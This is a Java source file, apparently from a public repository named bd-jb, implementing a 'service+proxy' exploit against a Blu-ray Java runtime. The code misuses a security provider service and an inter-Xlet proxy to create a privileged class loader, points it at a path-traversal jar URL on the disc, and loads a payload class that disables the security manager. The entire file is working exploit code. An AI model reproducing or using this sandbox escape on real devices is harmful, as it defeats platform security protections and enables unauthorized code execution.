bd-jb/com/bdjb/ExploitServiceProxyImpl.java
2021-10-24 17:23:44 +02:00

61 lines
2.1 KiB
Java

/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLClassLoader;
import java.security.Security;
import java.security.Provider;
/** Implementation of the service+proxy exploit. */
class ExploitServiceProxyImpl implements ExploitInterface {
private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
private static final String NEW_INSTANCE_METHOD_SIGNATURE =
"(Ljava/lang/Object;)Ljava/lang/Object;";
private static final String JAR_URL =
"file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
public void trigger() throws Exception {
// Throw exception if class does not exist.
Class.forName(SERVICE_CLASS_NAME);
IxcProxyImpl proxy = IxcProxyImpl.getInstance();
// Prepare service object with the class to be instantiated.
Provider[] providers = Security.getProviders();
ServiceImpl service =
new ServiceImpl(
providers[0], "exploit", "exploit", URLClassLoader.class.getName(), null, null);
ProviderAccessorImpl providerAccessor = new ProviderAccessorImpl(providers);
providerAccessor.putService(providers[0], service);
providerAccessor.setProviderAccessor();
// Instantiate the URLClassLoader class with privileges and a vulnerable path.
URL[] urls = new URL[] {new URL(JAR_URL)};
URLClassLoader urlClassLoader =
(URLClassLoader)
proxy.invokeMethod(
service,
NEW_INSTANCE_METHOD_NAME,
NEW_INSTANCE_METHOD_SIGNATURE,
new Object[] {urls});
// Instantiate the payload class with all permissions to disable the security manager.
Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
payloadClass.newInstance();
}
}